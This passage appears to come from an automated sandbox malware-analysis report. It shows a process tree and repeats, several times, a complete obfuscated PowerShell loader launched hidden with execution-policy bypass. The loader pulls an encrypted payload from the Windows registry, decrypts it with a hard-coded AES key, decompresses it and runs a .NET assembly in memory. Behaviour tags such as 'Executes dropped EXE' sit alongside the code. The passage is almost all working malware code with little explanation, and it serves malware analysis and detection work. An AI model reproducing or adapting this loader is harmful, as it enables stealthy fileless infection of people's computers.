'')('iTx/W/jnzoHE14r8DEibMEyuaeYiE3dAqeSv8NW3jSN5A97h+1KY+THryvIh1dJiGmsnJ//SXLVPWbfMRzL7ufXSCGPz+pfVsuxaLTSyptiJPzqcoan9Xr1jE4Rmc5u7LTId80wSaXqLNmoB4fPg/P7NE3c2Yuw0nqWt/ZngWniFYubjYtKMqyyNRSfNgyr89Ug/vFc6LgfL0bPIYeBlHCze7nx8PsBL+Q/EBybHWqUfBjNVsJmx3EeYrFfxNdSC3e8Y+JBmg8TSGLJHyBt+tFwMt/TmHxps75m66JuQeZLlhKeLZ6bjJ74zTvsp2A8buoYwDETvErAcvrBSGhVS7mYWy6o4J4BMWokYyeV+Cq7Q8/73SCovtE69+hmKy7HRlFzPuhkQyPHRSeQjZ9+873yj/eogIwSIkiXGB0fk3+g=');$XVVPy = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVVPy, 0, $XVVPy.Length);$XVVPy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVVPy);$ZnwOj = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('l578nKfyTb6bpNlYfElbzQ==');$ZnwOj = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($ZnwOj, 0, $ZnwOj.Length);$ZnwOj = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($ZnwOj);$cOnuq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('1OZ44W6bdY1aa1QLUX4fJA==');$cOnuq = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($cOnuq, 0, $cOnuq.Length);$cOnuq = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($cOnuq);$gBBaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('KPGj8zPRDGjW+cttrplwtg==');$gBBaw = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($gBBaw, 0, $gBBaw.Length);$gBBaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($gBBaw);$HVXKt = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('wg3LvN/Da8EBkYu0PdZp+A==');$HVXKt = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($HVXKt, 0, $HVXKt.Length);$HVXKt = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($HVXKt);$ewjne = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('bahh8RYkzn28RHBrHTR6Rw==');$ewjne = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($ewjne, 0, $ewjne.Length);$ewjne = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($ewjne);$UswSE0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('7ps7mtx52AURDUYRcez/RA==');$UswSE0 = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UswSE0, 0, $UswSE0.Length);$UswSE0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UswSE0);$UswSE1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('c5XC748b+iFBdBWdnZ4s2w==');$UswSE1 = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UswSE1, 0, $UswSE1.Length);$UswSE1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UswSE1);$UswSE2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('eJLAPTei3F5Fj8pfHCkW0A==');$UswSE2 = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UswSE2, 0, $UswSE2.Length);$UswSE2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UswSE2);$UswSE3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('7VMq7slMB5TL9zlr2duzSA==');$UswSE3 = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UswSE3, 0, $UswSE3.Length);$UswSE3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UswSE3);$cXkwu.Dispose();$OeLLh1.Dispose();$vDMJP = [Microsoft.Win32.Registry]::$HVXKt.$gBBaw($UswSE).$cOnuq($Dsgcn);$ZyJrD=[string[]]$vDMJP.Split('\');$pKkNV=XSkGH(CzXOR([System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZyJrD[1])));BdfTq $pKkNV (,[string[]] ('%*'));$quBDS = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZyJrD[0]);$OeLLh = New-Object System.Security.Cryptography.AesManaged;$OeLLh.Mode = [System.Security.Cryptography.CipherMode]::CBC;$OeLLh.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$OeLLh.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('swD/g0ddwufYKX/qihDrldk6m+EvFku6CpuKgW+L79U=');$OeLLh.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('hO/TaNK/xjmsS/krRQP/2Q==');$CdjJU = $OeLLh.('rotpyrceDetaerC'[-1..-15] -join '')();$quBDS = $CdjJU.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($quBDS, 0, $quBDS.Length);$CdjJU.Dispose();$OeLLh.Dispose();$YMVfV = New-Object System.IO.MemoryStream(, $quBDS);$HPwhP = New-Object System.IO.MemoryStream;$LnniF = New-Object System.IO.Compression.GZipStream($YMVfV, [IO.Compression.CompressionMode]::$UswSE1);$LnniF.$ewjne($HPwhP);$LnniF.Dispose();$YMVfV.Dispose();$HPwhP.Dispose();$quBDS = $HPwhP.ToArray();$xnpKq = $XVVPy | IEX;$ZLyfJ = $xnpKq::$UswSE2($quBDS);$xoyvm = $ZLyfJ.EntryPoint;$xoyvm.$UswSE0($null, (, [string[]] ($WtQaE)))
        5⤵
        Suspicious use of NtCreateUserProcessOtherParentProcess
        Executes dropped EXE
        Suspicious use of SetThreadContext
        Suspicious behavior: EnumeratesProcesses
        
        PID:1212
    - - C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(4352).WaitForExit();[System.Threading.Thread]::Sleep(5000); function CzXOR($wCmAa){ $OeLLh=[System.Security.Cryptography.Aes]::Create(); $OeLLh.Mode=[System.Security.Cryptography.CipherMode]::CBC; $OeLLh.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $OeLLh.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('swD/g0ddwufYKX/qihDrldk6m+EvFku6CpuKgW+L79U='); $OeLLh.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('hO/TaNK/xjmsS/krRQP/2Q=='); $CdjJU=$OeLLh.('rotpyrceDetaerC'[-1..-15] -join '')(); $ZrPpX=$CdjJU.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($wCmAa, 0, $wCmAa.Length); $CdjJU.Dispose(); $OeLLh.Dispose(); $ZrPpX;}function XSkGH($wCmAa){ $YMVfV=New-Object System.IO.MemoryStream(,$wCmAa); $HPwhP=New-Object System.IO.MemoryStream; $LnniF=New-Object System.IO.Compression.GZipStream($YMVfV, [IO.Compression.CompressionMode]::Decompress); $LnniF.CopyTo($HPwhP); $LnniF.Dispose(); $YMVfV.Dispose(); $HPwhP.Dispose(); $HPwhP.ToArray();}function BdfTq($wCmAa,$IUdXm){ $ZLyfJ=[System.Reflection.Assembly]::Load([byte[]]$wCmAa); $xoyvm=$ZLyfJ.EntryPoint; $xoyvm.Invoke($null, $IUdXm);}$OeLLh1 = New-Object System.Security.Cryptography.AesManaged;$OeLLh1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$OeLLh1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$OeLLh1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('swD/g0ddwufYKX/qihDrldk6m+EvFku6CpuKgW+L79U=');$OeLLh1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('hO/TaNK/xjmsS/krRQP/2Q==');$cXkwu = $OeLLh1.('rotpyrceDetaerC'[-1..-15] -join '')();$UswSE = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('18zwi26zozI/4sNwvOJxpg==');$UswSE = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UswSE, 0, $UswSE.Length);$UswSE = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UswSE);$Dsgcn = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('EkARJ6Rv6BIg2MogoHYcmw/X0/TgnV5+LWpTmFkicv4=');$Dsgcn = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Dsgcn, 0, $Dsgcn.Length);$Dsgcn = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Dsgcn);$WtQaE = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('CPgoovSvydwIKAVbsV0oUg==');$WtQaE = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($WtQaE, 0, $WtQaE.Length);$WtQaE = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($WtQaE);$XVVPy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('iTx/W/jnzoHE14r8DEibMEyuaeYiE3dAqeSv8NW3jSN5A97h+1KY+THryvIh1dJiGmsnJ//SXLVPWbfMRzL7ufXSCGPz+pfVsuxaLTSyptiJPzqcoan9Xr1jE4Rmc5u7LTId80wSaXqLNmoB4fPg/P7NE3c2Yuw0nqWt/ZngWniFYubjYtKMqyyNRSfNgyr89Ug/vFc6LgfL0bPIYeBlHCze7nx8PsBL+Q/EBybHWqUfBjNVsJmx3EeYrFfxNdSC3e8Y+JBmg8TSGLJHyBt+tFwMt/TmHxps75m66JuQeZLlhKeLZ6bjJ74zTvsp2A8buoYwDETvErAcvrBSGhVS7mYWy6o4J4BMWokYyeV+Cq7Q8/73SCovtE69+hmKy7HRlFzPuhkQyPHRSeQjZ9+873yj/eogIwSIkiXGB0fk3+g=');$XVVPy = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVVPy, 0, $XVVPy.Length);$XVVPy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVVPy);$ZnwOj = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('l578nKfyTb6bpNlYfElbzQ==');$ZnwOj = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($ZnwOj, 0, $ZnwOj.Length);$ZnwOj = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($ZnwOj);$cOnuq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('1OZ44W6bdY1aa1QLUX4fJA==');$cOnuq = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($cOnuq, 0, $cOnuq.Length);$cOnuq = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($cOnuq);$gBBaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('KPGj8zPRDGjW+cttrplwtg==');$gBBaw = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($gBBaw, 0, $gBBaw.Length);$gBBaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($gBBaw);$HVXKt = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('wg3LvN/Da8EBkYu0PdZp+A==');$HVXKt = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($HVXKt, 0, $HVXKt.Length);$HVXKt = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($HVXKt);$ewjne = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('bahh8RYkzn28RHBrHTR6Rw==');$ewjne = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($ewjne, 0, $ewjne.Length);$ewjne = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($ewjne);$UswSE0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('7ps7mtx52AURDUYRcez/RA==');$UswSE0 = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UswSE0, 0, $UswSE0.Length);$UswSE0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UswSE0);$UswSE1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('c5XC748b+iFBdBWdnZ4s2w==');$UswSE1 = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UswSE1, 0, $UswSE1.Length);$UswSE1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UswSE1);$UswSE2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('eJLAPTei3F5Fj8pfHCkW0A==');$UswSE2 = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UswSE2, 0, $UswSE2.Length);$UswSE2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UswSE2);$UswSE3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('7VMq7slMB5TL9zlr2duzSA==');$UswSE3 = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UswSE3, 0, $UswSE3.Length);$UswSE3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UswSE3);$cXkwu.Dispose();$OeLLh1.Dispose();$vDMJP = [Microsoft.Win32.Registry]::$HVXKt.$gBBaw($UswSE).$cOnuq($Dsgcn);$ZyJrD=[string[]]$vDMJP.Split('\');$pKkNV=XSkGH(CzXOR([System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZyJrD[1])));BdfTq $pKkNV (,[string[]] ('%*'));$quBDS = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZyJrD[0]);$OeLLh = New-Object System.Security.Cryptography.AesManaged;$OeLLh.Mode = [System.Security.Cryptography.CipherMode]::CBC;$OeLLh.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$OeLLh.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('swD/g0ddwufYKX/qihDrldk6m+EvFku6CpuKgW+L79U=');$OeLLh.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('hO/TaNK/xjmsS/krRQP/2Q==');$CdjJU = $OeLLh.('rotpyrceDetaerC'[-1..-15] -join '')();$quBDS = $CdjJU.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($quBDS, 0, $quBDS.Length);$CdjJU.Dispose();$OeLLh.Dispose();$YMVfV = New-Object System.IO.MemoryStream(, $quBDS);$HPwhP = New-Object System.IO.MemoryStream;$LnniF = New-Object System.IO.Compression.GZipStream($YMVfV, [IO.Compression.CompressionMode]::$UswSE1);$LnniF.$ewjne($HPwhP);$LnniF.Dispose();$YMVfV.Dispose();$HPwhP.Dispose();$quBDS = $HPwhP.ToArray();$xnpKq = $XVVPy | IEX;$ZLyfJ = $xnpKq::$UswSE2($quBDS);$xoyvm = $ZLyfJ.EntryPoint;$xoyvm.$UswSE0($null, (, [string[]] ($WtQaE)))
        5⤵
        Suspicious use of NtCreateUserProcessOtherParentProcess
        Executes dropped EXE
        Suspicious use of SetThreadContext
        Suspicious behavior: EnumeratesProcesses
        
        PID:6132
    - - C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(4352).WaitForExit();[System.Threading.Thread]::Sleep(5000); function CzXOR($wCmAa){ $OeLLh=[System.Security.Cryptography.Aes]::Create(); $OeLLh.Mode=[System.Security.Cryptography.CipherMode]::CBC; $OeLLh.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $OeLLh.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('swD/g0ddwufYKX/qihDrldk6m+EvFku6CpuKgW+L79U='); $OeLLh.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('hO/TaNK/xjmsS/krRQP/2Q=='); $CdjJU=$OeLLh.('rotpyrceDetaerC'[-1..-15] -join '')(); $ZrPpX=$CdjJU.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($wCmAa, 0, $wCmAa.Length); $CdjJU.Dispose(); $OeLLh.Dispose(); $ZrPpX;}function XSkGH($wCmAa){ $YMVfV=New-Object System.IO.MemoryStream(,$wCmAa); $HPwhP=New-Object System.IO.MemoryStream; $LnniF=New-Object System.IO.Compression.GZipStream($YMVfV, [IO.Compression.CompressionMode]::Decompress); $LnniF.CopyTo($HPwhP); $LnniF.Dispose(); $YMVfV.Dispose(); $HPwhP.Dispose(); $HPwhP.ToArray();}function BdfTq($wCmAa,$IUdXm){ $ZLyfJ=[System.Reflection.Assembly]::Load([byte[]]$wCmAa); $xoyvm=$ZLyfJ.EntryPoint; $xoyvm.Invoke($null, $IUdXm);}$OeLLh1 = New-Object System.Security.Cryptography.AesManaged;$OeLLh1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$OeLLh1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$OeLLh1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('swD/g0ddwufYKX/qihDrldk6m+EvFku6CpuKgW+L79U=');$OeLLh1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('hO/TaNK/xjmsS/krRQP/2Q==');$cXkwu = $OeLLh1.('rotpyrceDetaerC'[-1..-15] -join '')();$UswSE = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('18zwi26zozI/4sNwvOJxpg==');$UswSE = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UswSE, 0, $UswSE.Length);$UswSE = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UswSE);$Dsgcn = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('EkARJ6Rv6BIg2MogoHYcmw/X0/TgnV5+LWpTmFkicv4=');$Dsgcn = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Dsgcn, 0, $Dsgcn.Length);$Dsgcn = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Dsgcn);$WtQaE = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('CPgoovSvydwIKAVbsV0oUg==');$WtQaE = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($WtQaE, 0, $WtQaE.Length);$WtQaE = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($WtQaE);$XVVPy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('iTx/W/jnzoHE14r8DEibMEyuaeYiE3dAqeSv8NW3jSN5A97h+1KY+THryvIh1dJiGmsnJ//SXLVPWbfMRzL7ufXSCGPz+pfVsuxaLTSyptiJPzqcoan9Xr1jE4Rmc5u7LTId80wSaXqLNmoB4fPg/P7NE3c2Yuw0nqWt/ZngWniFYubjYtKMqyyNRSfNgyr89Ug/vFc6LgfL0bPIYeBlHCze7nx8PsBL+Q/EBybHWqUfBjNVsJmx3EeYrFfxNdSC3e8Y+JBmg8TSGLJHyBt+tFwMt/TmHxps75m66JuQeZLlhKeLZ6bjJ74zTvsp2A8buoYwDETvErAcvrBSGhVS7mYWy6o4J4BMWokYyeV+Cq7Q8/73SCovtE69+hmKy7HRlFzPuhkQyPHRSeQjZ9+873yj/eogIwSIkiXGB0fk3+g=');$XVVPy = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVVPy, 0, $XVVPy.Length);$XVVPy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVVPy);$ZnwOj = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('l578nKfyTb6bpNlYfElbzQ==');$ZnwOj = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($ZnwOj, 0, $ZnwOj.Length);$ZnwOj = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($ZnwOj);$cOnuq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('1OZ44W6bdY1aa1QLUX4fJA==');$cOnuq = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($cOnuq, 0, $cOnuq.Length);$cOnuq = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($cOnuq);$gBBaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('KPGj8zPRDGjW+cttrplwtg==');$gBBaw = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($gBBaw, 0, $gBBaw.Length);$gBBaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($gBBaw);$HVXKt = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('wg3LvN/Da8EBkYu0PdZp+A==');$HVXKt = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($HVXKt, 0, $HVXKt.Length);$HVXKt = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($HVXKt);$ewjne = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('bahh8RYkzn28RHBrHTR6Rw==');$ewjne = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($ewjne, 0, $ewjne.Length);$ewjne = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($ewjne);$UswSE0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('7ps7mtx52AURDUYRcez/RA==');$UswSE0 = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UswSE0, 0, $UswSE0.Length);$UswSE0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UswSE0);$UswSE1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('c5XC748b+iFBdBWdnZ4s2w==');$UswSE1 = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UswSE1, 0, $UswSE1.Length);$UswSE1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UswSE1);$UswSE2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('eJLAPTei3F5Fj8pfHCkW0A==');$UswSE2 = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UswSE2, 0, $UswSE2.Length);$UswSE2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UswSE2);$UswSE3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('7VMq7slMB5TL9zlr2duzSA==');$UswSE3 = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UswSE3, 0, $UswSE3.Length);$UswSE3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UswSE3);$cXkwu.Dispose();$OeLLh1.Dispose();$vDMJP = [Microsoft.Win32.Registry]::$HVXKt.$gBBaw($UswSE).$cOnuq($Dsgcn);$ZyJrD=[string[]]$vDMJP.Split('\');$pKkNV=XSkGH(CzXOR([System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZyJrD[1])));BdfTq $pKkNV (,[string[]] ('%*'));$quBDS = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZyJrD[0]);$OeLLh = New-Object System.Security.Cryptography.AesManaged;$OeLLh.Mode = [System.Security.Cryptography.CipherMode]::CBC;$OeLLh.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$OeLLh.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('swD/g0ddwufYKX/qihDrldk6m+EvFku6CpuKgW+L79U=');$OeLLh.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('hO/TaNK/xjmsS/krRQP/2Q==');$CdjJU = $OeLLh.('rotpyrceDetaerC'[-1..-15] -join '')();$quBDS = $CdjJU.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($quBDS, 0, $quBDS.Length);$CdjJU.Dispose();$OeLLh.Dispose();$YMVfV = New-Object System.IO.MemoryStream(, $quBDS);$HPwhP = New-Object System.IO.MemoryStream;$LnniF = New-Object System.IO.Compression.GZipStream($YMVfV, [IO.Compression.CompressionMode]::$UswSE1);$LnniF.$ewjne($HPwhP);$LnniF.Dispose();$YMVfV.Dispose();$HPwhP.Dispose();$quBDS = $HPwhP.ToArray();$xnpKq = $XVVPy | IEX;$ZLyfJ = $xnpKq::$UswSE2($quBDS);$xoyvm = $ZLyfJ.EntryPoint;$xoyvm.$UswSE0($null, (, [string[]] ($WtQaE)))
        5⤵
        Suspicious use of NtCreateUserProcessOtherParentProcess
        Executes dropped EXE
        Suspicious use of SetThreadContext
        Suspicious behavior: EnumeratesProcesses
        
        PID:4076
    - - C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(4352).WaitForExit();[System.Threading.Thread]::Sleep(5000); function CzXOR($wCmAa){ $OeLLh=[System.Security.Cryptography.Aes]::Create(); $OeLLh.Mode=[System.Security.Cryptography.CipherMode]::CBC; $OeLLh.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $OeLLh.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('swD/g0ddwufYKX/qihDrldk6m+EvFku6CpuKgW+L79U='); $OeLLh.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('hO/TaNK/xjmsS/krRQP/2Q=='); $CdjJU=$OeLLh.('rotpyrceDetaerC'[-1..-15] -join '')(); $ZrPpX=$CdjJU.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($wCmAa, 0, $wCmAa.Length); $CdjJU.Dispose(); $OeLLh.Dispose(); $ZrPpX;}function XSkGH($wCmAa){ $YMVfV=New-Object System.IO.MemoryStream(,$wCmAa); $HPwhP=New-Object System.IO.MemoryStream; $LnniF=New-Object System.IO.Compression.GZipStream($YMVfV, [IO.Compression.CompressionMode]::Decompress); $LnniF.CopyTo($HPwhP); $LnniF.Dispose(); $YMVfV.Dispose(); $HPwhP.Dispose(); $HPwhP.ToArray();}function BdfTq($wCmAa,$IUdXm){ $ZLyfJ=[System.Reflection.Assembly]::Load([byte[]]$wCmAa); $xoyvm=$ZLyfJ.EntryPoint; $xoyvm.Invoke($null, $IUdXm);}$OeLLh1 = New-Object System.Security.Cryptography.AesManaged;$OeLLh1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$OeLLh1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$OeLLh1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('swD/g0ddwufYKX/qihDrldk6m+EvFku6CpuKgW+L79U=');$OeLLh1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('hO/TaNK/xjmsS/krRQP/2Q==');$cXkwu = $OeLLh1.('rotpyrceDetaerC'[-1..-15] -join '')();$UswSE = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('18zwi26zozI/4sNwvOJxpg==');$UswSE = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UswSE, 0, $UswSE.Length);$UswSE = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UswSE);$Dsgcn = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('EkARJ6Rv6BIg2MogoHYcmw/X0/TgnV5+LWpTmFkicv4=');$Dsgcn = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Dsgcn, 0, $Dsgcn.Length);$Dsgcn = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Dsgcn);$WtQaE = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('CPgoovSvydwIKAVbsV0oUg==');$WtQaE = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($WtQaE, 0, $WtQaE.Length);$WtQaE = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($WtQaE);$XVVPy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join 